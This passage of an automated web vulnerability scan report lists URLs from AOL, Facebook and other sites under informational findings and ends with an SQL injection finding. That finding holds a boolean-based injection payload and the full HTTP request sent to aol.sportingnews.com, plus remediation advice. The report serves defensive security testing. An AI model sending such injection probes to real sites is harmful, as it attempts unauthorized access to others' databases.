28.632. http://www.facebook.com/plugins/send.php

28.633. http://www.facebook.com/plugins/send.php

28.634. http://www.facebook.com/plugins/send.php

28.635. http://www.facebook.com/plugins/send.php

28.636. http://www.facebook.com/plugins/send.php

28.637. http://www.facebook.com/plugins/send.php

28.638. http://www.facebook.com/plugins/send.php

28.639. http://www.facebook.com/plugins/send.php

28.640. http://www.facebook.com/plugins/send.php

28.641. http://www.facebook.com/plugins/send.php

28.642. http://www.facebook.com/plugins/send.php

28.643. http://www.facebook.com/plugins/send.php

28.644. http://www.facebook.com/plugins/send.php

28.645. http://www.facebook.com/plugins/send.php

28.646. http://www.facebook.com/plugins/send.php

28.647. http://www.facebook.com/plugins/send.php

28.648. http://www.facebook.com/plugins/send.php

28.649. http://www.facebook.com/plugins/send.php

28.650. http://www.facebook.com/plugins/send.php

28.651. http://www.facebook.com/plugins/send.php

28.652. http://www.facebook.com/plugins/send.php

28.653. http://www.facebook.com/plugins/send.php

28.654. http://www.facebook.com/plugins/send.php

28.655. http://www.facebook.com/plugins/send.php

28.656. http://www.facebook.com/plugins/send.php

28.657. http://www.facebook.com/plugins/send.php

28.658. http://www.facebook.com/plugins/send.php

28.659. http://www.facebook.com/plugins/send.php

28.660. http://www.facebook.com/plugins/send.php

28.661. http://www.facebook.com/plugins/send.php

28.662. http://www.facebook.com/plugins/send.php

28.663. http://www.facebook.com/plugins/send.php

28.664. http://www.facebook.com/plugins/send.php

28.665. http://www.facebook.com/plugins/send.php

28.666. http://www.facebook.com/plugins/send.php

28.667. http://www.facebook.com/plugins/send.php

28.668. http://www.facebook.com/plugins/send.php

28.669. http://www.facebook.com/plugins/send.php

28.670. http://www.facebook.com/plugins/send.php

28.671. http://www.facebook.com/plugins/send.php

28.672. http://www.facebook.com/plugins/send.php

28.673. http://www.facebook.com/plugins/send.php

28.674. http://www.facebook.com/plugins/send.php

28.675. http://www.facebook.com/plugins/send.php

28.676. http://www.facebook.com/plugins/send.php

28.677. http://www.facebook.com/plugins/send.php

28.678. http://www.facebook.com/plugins/send.php

28.679. http://www.facebook.com/plugins/send.php

28.680. http://www.facebook.com/plugins/send.php

28.681. http://www.facebook.com/plugins/send.php

28.682. http://www.facebook.com/plugins/send.php

28.683. http://www.facebook.com/plugins/send.php

28.684. http://www.facebook.com/plugins/send.php

28.685. http://www.facebook.com/plugins/send.php

28.686. http://www.facebook.com/plugins/send.php

28.687. http://www.facebook.com/plugins/send.php

28.688. http://www.facebook.com/plugins/send.php

28.689. http://www.facebook.com/plugins/send.php

28.690. http://www.facebook.com/policy.php

28.691. http://www.facebook.com/privacy/explanation.php

28.692. http://www.facebook.com/profile.php

28.693. http://www.facebook.com/profile.php

28.694. http://www.facebook.com/profile.php

28.695. http://www.facebook.com/r.php

28.696. http://www.facebook.com/r.php

28.697. http://www.facebook.com/r.php

28.698. http://www.facebook.com/r.php

28.699. http://www.facebook.com/r.php

28.700. http://www.facebook.com/recover.php

28.701. http://www.facebook.com/recover.php

28.702. http://www.facebook.com/recover.php

28.703. http://www.facebook.com/robynalys

28.704. http://www.facebook.com/share.php

28.705. http://www.facebook.com/share.php

28.706. http://www.facebook.com/share.php

28.707. http://www.facebook.com/sharer.php

28.708. http://www.facebook.com/sharer.php

28.709. http://www.facebook.com/sharer.php

28.710. http://www.facebook.com/sharer.php

28.711. http://www.facebook.com/skdarealist

28.712. http://www.facebook.com/sportingnews

28.713. http://www.facebook.com/stefanoboscolomarchi

28.714. http://www.facebook.com/techcrunch

28.715. http://www.facebook.com/terms.php

28.716. http://www.facebook.com/terms.php

28.717. http://www.facebook.com/terms.php

28.718. http://www.facebook.com/terms.php

28.719. http://www.facebook.com/theteebers

28.720. http://www.facebook.com/wmoppert

28.721. https://www.facebook.com/

28.722. https://www.facebook.com/

28.723. https://www.facebook.com/ajax/intl/language_dialog.php

28.724. https://www.facebook.com/ajax/intl/language_dialog.php

28.725. https://www.facebook.com/ajax/intl/language_dialog.php

28.726. https://www.facebook.com/captcha/tfbimage.php

28.727. https://www.facebook.com/favicon.ico

28.728. https://www.facebook.com/favicon.ico

28.729. https://www.facebook.com/h02332

28.730. https://www.facebook.com/h02332

28.731. https://www.facebook.com/h02332

28.732. https://www.facebook.com/help/contact.php

28.733. https://www.facebook.com/login.php

28.734. https://www.facebook.com/login.php

28.735. https://www.facebook.com/login.php

28.736. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

28.737. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

28.738. https://www.facebook.com/pages/create.php

28.739. https://www.facebook.com/pages/create.php

28.740. https://www.facebook.com/pages/create.php

28.741. https://www.facebook.com/r.php

28.742. https://www.facebook.com/r.php

28.743. https://www.facebook.com/r.php

28.744. https://www.facebook.com/recover.php

28.745. https://www.facebook.com/recover.php

28.746. http://www.google.com/sdch/rU20-FBA.dct

29. Credit card numbers disclosed

29.1. http://aol.sportingnews.com/

29.2. http://aol.sportingnews.com/

29.3. http://www.facebook.com/directory/pages/

29.4. http://www.facebook.com/directory/people/

30. Robots.txt file

30.1. http://404-bgd-511.mktoresp.com/webevents/visitWebPage

30.2. http://a0.twimg.com/profile_images/1115304440/eiNu5UkN_normal

30.3. http://abcnews.go.com/Entertainment/popup

30.4. http://ad.doubleclick.net/ad/N4873.AOL.com/B5465585.3

30.5. http://ads.pointroll.com/PortalServe/

30.6. http://ads.undertone.com/afr.php

30.7. https://adwords.google.com/select/Login

30.8. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2

30.9. http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter

30.10. http://aol.worldwinner.com/cgi/welcome/21sie

30.11. http://aolmobile.aol.com/registration/welcome

30.12. http://aolmobile.aolcdn.com/favicon.ico

30.13. http://aolproductcentral.aol.com/ClickBroker

30.14. https://aolproductcentral.aol.com/ClickBroker

30.15. http://apartments.rentedspaces.oodle.com/

30.16. http://api.adcopy.com/papi/challenge.ajax

30.17. http://api.local.yahoo.com/MapsService/V1/geocode

30.18. http://api.twitter.com/receiver.html

30.19. http://ar-ar.facebook.com/login.php

30.20. http://ar.atwola.com/atd

30.21. http://archive.constantcontact.com/fs060/1101663036970/archive/1102715603213.html

30.22. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x600

30.23. https://at.atwola.com/

30.24. http://autocomplete.search.aol.com/autocomplete/get

30.25. http://ax.itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast

30.26. http://b.scorecardresearch.com/b

30.27. http://b.trymedia.com/b/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup

30.28. http://b.voicefive.com/b

30.29. http://blog.mapquest.com/

30.30. http://blogsearch.google.com/

30.31. http://bongo.zoomin.tv/videoplayer/skins/999/aol/AOLPlayer.swf

30.32. http://books.google.com/bkshp

30.33. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.34. http://c.brightcove.com/services/viewer/federated_f9

30.35. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4

30.36. http://cheetah.vizu.com/a.gif

30.37. http://clients1.google.com/webpagethumbnail

30.38. http://clk.atdmt.com/go/253735228/direct

30.39. http://cm.g.doubleclick.net/pixel

30.40. http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico

30.41. http://d.tradex.openx.com/afr.php

30.42. http://d.trymedia.com/d/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup.rga

30.43. http://d.xp1.ru4.com/um

30.44. http://d1.openx.org/spcjs.php

30.45. http://daol.aol.com/software/

30.46. http://dev.aol.com/

30.47. http://digg.com/submit

30.48. http://docs.google.com/

30.49. http://fantasysource.sportingnews.com/baseball/free

30.50. http://features.mapquest.com/toolbar/

30.51. http://feedburner.google.com/fb/a/mailverify

30.52. http://feeds.bbci.co.uk/news/rss.xml

30.53. http://fls.doubleclick.net/activityi

30.54. http://fusion.google.com/add

30.55. http://googleads.g.doubleclick.net/aclk

30.56. http://graph.facebook.com/10134017/picture

30.57. http://gravatar.com/profiles/edit/

30.58. http://groups.google.com/groups

30.59. http://huffingtonpost.search.aol.com/search

30.60. http://images.apple.com/global/nav/scripts/globalnav.js

30.61. http://img-cdn.mediaplex.com/0/14302/119028/TC_OLE_results_art_125x125.gif

30.62. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

30.63. http://itunes.apple.com/app/sporting-news-pro-football/id300213367

30.64. http://l.addthiscdn.com/live/t00/250lo.gif

30.65. http://m.twitter.com/favicon.ico

30.66. http://mail.aol.com/

30.67. http://mail.google.com/mail/

30.68. https://maps-api-ssl.google.com/maps

30.69. http://maps.google.com/maps

30.70. http://market.android.com/details

30.71. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s72248036712408

30.72. http://mobile.aol.com/

30.73. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

30.74. http://music.aol.com/radioguide/bb

30.75. https://new.aol.com/productsweb/

30.76. http://news.google.com/news/story

30.77. http://newsfeed.time.com/2011/05/04/do-chicks-and-fans-really-dig-the-long-ball-why-no-hitters-arent-drawing-crowds/

30.78. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

30.79. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s32818515414837

30.80. http://pagead2.googlesyndication.com/pagead/imgad

30.81. http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137

30.82. http://pixel.quantserve.com/pixel

30.83. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

30.84. http://pr.atwola.com/promoimp/100223980xx1201730986/aol

30.85. http://pubads.g.doubleclick.net/gampad/ads

30.86. http://puma.vizu.com/cdn/00/00/15/44/smart_tag.js

30.87. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

30.88. http://realestate.aol.com/

30.89. http://realestate.search.aol.com/search

30.90. https://rsp.web.aol.com/rsp-websvc-3.0/snsReg

30.91. http://s.gravatar.com/js/gprofiles.js

30.92. http://s0.wp.com/wp-content/themes/h4/global.css

30.93. http://s1.wp.com/wp-includes/js/jquery/jquery.js

30.94. http://s2.wp.com/wp-content/themes/vip/tctechcrunch/style.css

30.95. http://safebrowsing.clients.google.com/safebrowsing/downloads

30.96. http://scholar.google.com/schhp

30.97. http://search.aol.com/aol/imagehome

30.98. http://search.twitter.com/search

30.99. http://segment-pixel.invitemedia.com/pixel

30.100. http://sites.google.com/

30.101. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/861892/jlo-300x250-dl.jpg

30.102. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

30.103. http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/alvarez.rhodes.ap/index.html

30.104. https://spreadsheets.google.com/viewform

30.105. http://st.snimg.com/js/cinesport/nocontainer.js

30.106. http://static.ak.fbcdn.net/connect/xd_proxy.php

30.107. http://static.twitter.com/images/default_profile_normal.png

30.108. http://tacoda-fatcat.search.aol.com/fa/eval

30.109. http://tcr.tynt.com/javascripts/Tracer.js

30.110. http://techcrunch.com/

30.111. http://themes.googleusercontent.com/image

30.112. http://toolbarqueries.clients.google.com/tbproxy/af/query

30.113. http://translate.google.com/

30.114. http://translate.googleapis.com/translate_a/t

30.115. http://twitter.com/home

30.116. https://twitter.com/signup

30.117. http://video.aol.com/searchresults

30.118. http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/

30.119. http://video.google.com/

30.120. http://webcache.googleusercontent.com/search

30.121. http://webmail.aol.com/

30.122. http://widgets.digg.com/buttons/count

30.123. http://wireless.mapquest.com/

30.124. http://www.aolnews.com/

30.125. http://www.apple.com/itunes/affiliates/download/

30.126. http://www.bankrate.com/funnel/mortgages/

30.127. http://www.blogger.com/blog-post-reactions.g

30.128. http://www.citysbest.com/

30.129. http://www.cloudscan.me/

30.130. http://www.crunchboard.com/opening/detailjob.php

30.131. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.132. http://www.dailyfinance.com/

30.133. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.134. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

30.135. http://www.facebook.com/extern/login_status.php

30.136. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

30.137. http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.138. http://www.fiddler2.com/fiddler2/updatecheck.asp

30.139. http://www.flickr.com/badge_code_v2.gne

30.140. http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html

30.141. http://www.games.com/game/family-feud/

30.142. https://www.godaddy.com/

30.143. http://www.google-analytics.com/__utm.gif

30.144. http://www.google.com/aclk

30.145. http://www.googleadservices.com/pagead/conversion/1034849195/

30.146. http://www.huffingtonpost.com/

30.147. http://www.ibm.com/systems/info/x86servers/blades/networking/index.html

30.148. http://www.mapquest.com/

30.149. http://www.marketwatch.com/News/Story/Story.aspx

30.150. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

30.151. http://www.moviefone.com/

30.152. https://www.neodata.com/pub/snew/new_print.shtml

30.153. http://www.netvibes.com/subscribe.php

30.154. http://www.newsgator.com/ngs/subscriber/subext.aspx

30.155. http://www.popeater.com/

30.156. http://www.realtytrac.com/birdseyeimage/propertyimage.aspx

30.157. http://www.top-sec.com/vb/clientscript/ncode_imageresizer.js

30.158. http://www.truveo.com/search

30.159. http://www.tuaw.com/hub/app-reviews

30.160. http://xml.truveo.com/apiv3

30.161. http://yellowpages.aol.com/

31. Cacheable HTTPS response

31.1. https://account.login.aol.com/_cqr/registration/fetchRegImage

31.2. https://api.screenname.aol.com/

31.3. https://maps-api-ssl.google.com/maps

31.4. https://new.aol.com/productsweb/WordVerImage

31.5. https://secure.opinionlab.com/ccc01/comment_card.asp

31.6. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

31.7. https://us.etrade.com/e/t/welcome/whychooseetrade

31.8. https://www.facebook.com/ajax/intl/language_dialog.php

31.9. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

31.10. https://www.fightmagazine.com/mma-magazine/subscribe.asp

31.11. https://www.neodata.com/pub/snew/new_print.shtml

32. HTML does not specify charset

32.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

32.2. http://480-adver-view.c3metrics.com/v.js

32.3. http://abcnews.go.com/Entertainment/popup

32.4. https://account.login.aol.com/_cqr/registration/fetchRegImage

32.5. http://ad.doubleclick.net/clk

32.6. http://ads.pointroll.com/PortalServe/

32.7. http://ads.undertone.com/c

32.8. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

32.9. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

32.10. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php

32.11. http://aol.sportingnews.com/services/sn-promos/snt_promo_spot.php

32.12. http://aol.sportingnews.com/services/sn-promos/yearbooks.php

32.13. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250

32.14. http://browser.cdn.aol.com/customie8/aol/download.html

32.15. http://browsers.aol.com/customfirefox/aol/download.html

32.16. http://browsers.aol.com/customie/aol/download.html

32.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.18. http://cdn.at.atwola.com/_media/uac/tcode3.html

32.19. http://d.xp1.ru4.com/um

32.20. http://eatps.web.aol.com:9000/open_web_adhoc

32.21. http://fantasysource.sportingnews.com/baseball/free

32.22. http://fantasysource.sportingnews.com/baseball/promo

32.23. http://fantasysource.sportingnews.com/baseball/rankings

32.24. http://feedback.aol.com/help/newaolcom/

32.25. http://fls.doubleclick.net/activityi

32.26. http://fonts.citysbest.com/k/uni0vle-e.css

32.27. http://hostedusa3.whoson.com/include.js

32.28. http://image3.pubmatic.com/AdServer/UPug

32.29. http://js.adsonar.com/js/pass.html

32.30. http://legal.aol.com/TOS/

32.31. http://legal.aol.com/copyright-reporting/

32.32. http://mobile.aol.com/supported-carriers/

32.33. http://music.aol.com/_uac/adpage.html

32.34. http://music.aol.com/proxy/promo/

32.35. https://new.aol.com/productsweb/

32.36. https://new.aol.com/productsweb/WordVerAudio.mp3

32.37. https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

32.38. http://o.aolcdn.com/art/merge/

32.39. http://o.aolcdn.com/cdn.webmail.aol.com/mailtour/aol/en-us/index.htm

32.40. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico

32.41. http://ping.chartbeat.net/ping

32.42. http://pixel.quantserve.com/seg/r

32.43. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

32.44. http://privacy.aol.com/

32.45. http://r.nexac.com/e/getdata.xgi

32.46. http://realestate.aol.com/_uac/adpage.html

32.47. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

32.48. http://techcrunch.com/home/wpcom/public_html/wp-content/themes/vip/tctechcrunchimages/logos_small/techcrunch2.png

32.49. http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html

32.50. http://toolbar.aol.com/index.adp

32.51. http://top-sec.net/

32.52. http://uac.advertising.com/wrapper/aceUACping.htm

32.53. https://us.etrade.com/e/t/welcome/whychooseetrade

32.54. http://view.c3metrics.com/c3VTabstrct-6-2.php

32.55. http://view.c3metrics.com/v.js

32.56. http://www.aol.com/ads/load_v7.html

32.57. http://www.dailyfinance.com/_uac/adpage.html

32.58. http://www.huffingtonpost.com/ed-schultz/president-obama-and-ameri_b_856947.html

32.59. http://www.mapquest.com/cdn/_uac/adpage.htm

32.60. http://www.mmafighting.com/_uac/adpage.html

32.61. https://www.neodata.com/pub/snew/new_print.shtml

32.62. http://www.opselect.com/ad_feedback/survey.adp

32.63. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

33. HTML uses unrecognised charset

33.1. https://secure.opinionlab.com/ccc01/comment_card.asp

33.2. http://top-sec.net/quran/

33.3. http://top-sec.net/vb/

33.4. http://top-sec.net/vb/calendar.php

33.5. http://top-sec.net/vb/external.php

33.6. http://top-sec.net/vb/faq.php

33.7. http://top-sec.net/vb/forumdisplay.php

33.8. http://top-sec.net/vb/index.php

33.9. http://top-sec.net/vb/login.php

33.10. http://top-sec.net/vb/member.php

33.11. http://top-sec.net/vb/memberlist.php

33.12. http://top-sec.net/vb/online.php

33.13. http://top-sec.net/vb/post_thanks.php

33.14. http://top-sec.net/vb/profile.php

33.15. http://top-sec.net/vb/register.php

33.16. http://top-sec.net/vb/search.php

33.17. http://top-sec.net/vb/sendmessage.php

33.18. http://top-sec.net/vb/showgroups.php

33.19. http://top-sec.net/vb/showthread.php

33.20. http://top-sec.net/vb/tags.php

34. Content type incorrectly stated

34.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

34.2. http://480-adver-view.c3metrics.com/v.js

34.3. http://a1.twimg.com/profile_images/278881234/krugman_75_twitter_normal.gif

34.4. http://a1.twimg.com/profile_images/345739587/brand_normal.gif

34.5. http://a12.alphagodaddy.com/

34.6. http://a2.twimg.com/profile_images/254909555/NGTTwit3_normal.gif

34.7. http://a2.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg

34.8. http://a3.twimg.com/profile_images/323333673/twitterProfilePhoto_normal.jpg

34.9. https://account.login.aol.com/_cqr/registration/fetchRegImage

34.10. http://ad.doubleclick.net/clk

34.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1304557102**

34.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/557100472

34.13. http://ads.pointroll.com/PortalServe/

34.14. http://aka-cdn-ns.adtechus.com/images/445/Ad0St1Sz6Sq0V1Id20183485.jpg

34.15. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

34.16. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

34.17. http://an.tacoda.net/an/

34.18. http://api.screenname.aol.com/auth/getToken

34.19. https://api.screenname.aol.com/auth/getInfo

34.20. https://api.screenname.aol.com/auth/getToken

34.21. https://api.screenname.aol.com/auth/logout

34.22. http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json

34.23. http://ar.voicefive.com/b/rc.pli

34.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

34.25. http://ct.buzzfeed.com/wd/UserWidget

34.26. http://dev.aol.com/themes/zen/dac_2009/favicon.ico

34.27. http://eatps.web.aol.com:9000/open_web_adhoc

34.28. http://help.aol.com/help/img/vanessa_m_1._account_management

34.29. http://hostedusa3.whoson.com/include.js

34.30. http://image3.pubmatic.com/AdServer/UPug

34.31. http://images.apple.com/global/nav/scripts/globalnav.js

34.32. http://imgs.zinio.com/magimages/500399021/2011/416168844_170.jpg

34.33. http://mobile.aol.com/supported-carriers/

34.34. http://my.screenname.aol.com/_cqr/login/checkStatus.psp

34.35. https://my.screenname.aol.com/_cqr/login/checkStatus.psp

34.36. http://o.aolcdn.com/art/asylum_men/2009_main_transparent_black

34.37. http://o.aolcdn.com/art/dynanews/advertisement

34.38. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow

34.39. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow-lt

34.40. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow-rt

34.41. http://o.aolcdn.com/art/dynanews/lbg-photo-icon

34.42. http://o.aolcdn.com/art/merge

34.43. http://o.aolcdn.com/art/merge/

34.44. http://o.aolcdn.com/bill.aol.com

34.45. http://o.aolcdn.com/bill.aol.com/help/help_rev

34.46. http://o.aolcdn.com/bill.aol.com/help/help_rev/images/bubbles_faint_bg.jpg

34.47. http://o.aolcdn.com/billqa.aol.com

34.48. http://o.aolcdn.com/favicon.ico

34.49. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico

34.50. http://o.aolcdn.com/os_merge/

34.51. http://o.aolcdn.com/smartbox/SBG/REST/

34.52. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.ttf

34.53. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.woff

34.54. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.eot

34.55. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.ttf

34.56. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.woff

34.57. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.eot

34.58. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.ttf

34.59. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.woff

34.60. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.eot

34.61. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.ttf

34.62. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.woff

34.63. http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd

34.64. http://portalblog.aol.com/media/background_new.gif

34.65. http://r.nexac.com/e/getdata.xgi

34.66. http://realestate.search.aol.com/search

34.67. http://search.aol.com/aol/search

34.68. http://search.aol.com/aol/webhome

34.69. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

34.70. http://thumbnails.truveo.com/0019/0E/13/0E1365BA2F9FA0F2C672AB.jpg

34.71. http://thumbnails.truveo.com/0020/0D/02/0D02FB96964419B5B0548A.jpg

34.72. http://thumbnails.truveo.com/0020/65/BD/65BDA59B21148561B976CC.jpg

34.73. http://thumbnails.truveo.com/0020/7B/34/7B34DB70619895BDBA34C0.jpg

34.74. http://thumbnails.truveo.com/0021/53/1E/531E0C1223B27E297B70E5.jpg

34.75. http://thumbnails.truveo.com/0021/5F/D7/5FD79EA05AC04C8AC6F691.jpg

34.76. http://thumbnails.truveo.com/0022/50/81/5081FA28D8EB874CDF4710.jpg

34.77. http://thumbnails.truveo.com/0022/F1/31/F13153246C8EEA834ADD3E.jpg

34.78. http://thumbnails.truveo.com/0023/5E/0F/5E0F7F3A07E50EE46C2AF7.jpg

34.79. http://thumbnails.truveo.com/0023/B4/60/B46071BFD52CDE2AA71695.jpg

34.80. http://toolbar.aol.com/favicon.ico

34.81. http://translate.googleapis.com/translate_a/t

34.82. http://twitter.com/account/available_features

34.83. http://urls.api.twitter.com/1/urls/count.json

34.84. http://v360.mqcdn.com/sv/ac/coverages.mercator.jsonp

34.85. http://v360.mqcdn.com/sv/ac/styling.mercator.jsonp

34.86. http://view.c3metrics.com/c3VTabstrct-6-2.php

34.87. http://view.c3metrics.com/v.js

34.88. http://www.aol.com/ajax.jsp

34.89. http://www.blogsmithmedia.com/realestate.aol.com/blog/media/alec-foege.gif

34.90. http://www.facebook.com/extern/login_status.php

34.91. http://www.fiddler2.com/fiddler2/updatecheck.asp

34.92. http://www.google.com/buzz/api/button.js

34.93. http://www.huffingtonpost.com/ads/check_flights.php

34.94. http://www.huffingtonpost.com/badge/badges_json_v2.php

34.95. http://www.huffingtonpost.com/include/mod_times.php

34.96. http://www.mapquest.com/_svc/searchio

34.97. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

34.98. http://www.metricstream.com/js/functions_newweb.js

34.99. http://www.metricstream.com/js/functions_web.js

34.100. http://www.res-x.com/ws/r2/Resonance.aspx

34.101. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

35. Content type is not specified

35.1. http://ad.yieldmanager.com/st

35.2. http://widgets.digg.com/buttons/count

35.3. http://www.marketwatch.com/News/Story/Story.aspx

35.4. http://www.metricstream.com/favicon.ico



1. SQL injection
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=30
